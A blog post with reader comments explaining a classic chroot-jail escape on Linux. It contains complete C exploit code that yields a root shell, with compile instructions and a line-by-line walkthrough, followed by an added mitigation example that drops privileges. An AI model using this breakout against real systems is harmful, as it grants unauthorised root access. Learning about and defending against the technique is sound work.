Get out of jail

I recently switched my server to NetBSD for a
number of reasons. Mainly it was the challenge of having a new system,
and the brief experience I had with NetBSD was positive (except screen
on x86_64 failed to detect my terminfo properly). Another deciding
factor was the heightened security available on most BSD systems, NetBSD
and OpenBSD in particular. An example of this is NetBSD’s ability to
thwart a number of attack vectors for breaking out of chroot
gaols, the most prominent of which still works on Linux.

A chroot is a system call that traps a process in an environment
with a “fake” root directory so it can only access part of the
filesystem. This is often used when allowing untrusted users access to
your system, which makes this method doubly scary.

All that is needed for this to work is the ability to run a process as
root inside the chroot (being root inside a chroot is the most
common scenario) and the ability to create a directory (a given if you
are root in the chroot).

You can then use this little snippet of C code to break out of the
gaol:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");
  fchdir(curdir);
  chdir("../../../../../../../../../..");
  chroot(".");
  system("/bin/sh");
  return 0;
}

You can then compile this with cc breakout.c -static -o breakout and
move it to your chroot through scp or whatever means you want. Run
it, and you will be granted root on the machine without a chroot.

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

This portion is just the necessary headers for the
functions. fcntl.h is for all the file control stuff.

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");

This starts the main program function, creates a new directory and
chroots to it. You will now be chrooted in
/initial/directory/the-way-out. curdir is a file descriptor which
is used later on.

  fchdir(curdir);
  chdir("../../../../../../../../../..");

This will chdir out of your second gaol and into your first one. It
will then chdir you out of your initial chroot and put you
(hopefully) in the real root directory. If you know where your gaol is
on the real filesystem you can use the right number of ../ to get to
/. The curdir file descriptor is needed because ../ won’t work from a
straight gaol; it has to be (partly) broken first.

  system("/bin/sh");
  return 0;
}

This will launch the default shell /bin/sh and give you root access to the
whole system. Congratulations, now go tell your administrator to
switch to NetBSD before someone with malicious intent comes along.
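The precondition for the trick above is a process that is still root inside the gaol. The following is an added example (not part of the original post) of the usual mitigation on any Unix: chdir into the jail, chroot, then drop to an unprivileged uid/gid before running anything, and refuse to proceed if the caller asks to stay root. The jail path /var/jail and uid/gid 65534 in main() are assumed values.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Enter the chroot at `jail` and drop to the given unprivileged uid/gid.
 * Returns 0 on success, -errno on failure.  A root process inside the
 * jail is exactly what the breakout above needs, so uid/gid 0 is refused. */
int enter_jail(const char *jail, uid_t uid, gid_t gid) {
    if (uid == 0 || gid == 0)
        return -EINVAL;            /* never leave a root process in the jail */
    if (chdir(jail) != 0)          /* chdir first so "." is inside the jail */
        return -errno;
    if (chroot(".") != 0)
        return -errno;
    if (chdir("/") != 0)           /* cwd must be the new root, not above it */
        return -errno;
    if (setgroups(0, NULL) != 0)   /* drop supplementary groups */
        return -errno;
    if (setgid(gid) != 0)          /* gid before uid, while we can still do it */
        return -errno;
    if (setuid(uid) != 0)
        return -errno;
    if (setuid(0) == 0)            /* verify root really is gone */
        return -EPERM;
    return 0;
}

int main(void) {
    /* Assumed jail path and nobody-style ids; adjust for your system. */
    int rc = enter_jail("/var/jail", 65534, 65534);
    if (rc != 0) {
        fprintf(stderr, "enter_jail failed: %s\n", strerror(-rc));
        return 1;
    }
    execl("/bin/sh", "sh", (char *)NULL); /* now an unprivileged shell */
    return 1;
}
```

With root dropped, the mkdir/chroot/fchdir sequence in the snippet above fails at the second chroot, since chroot requires root.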


2 Comments

  1. Jacob
    Posted November 4, 2008 at 7:58 pm | Permalink

    Oops, “#include “, then nothing? Looking at the source of the page, PHP forgot to reinterpret the HTML entities. Might want to fix that before someone with malicious intent comes along. ;)

  2. Posted November 4, 2008 at 8:51 pm | Permalink

    Thanks, fixed now.
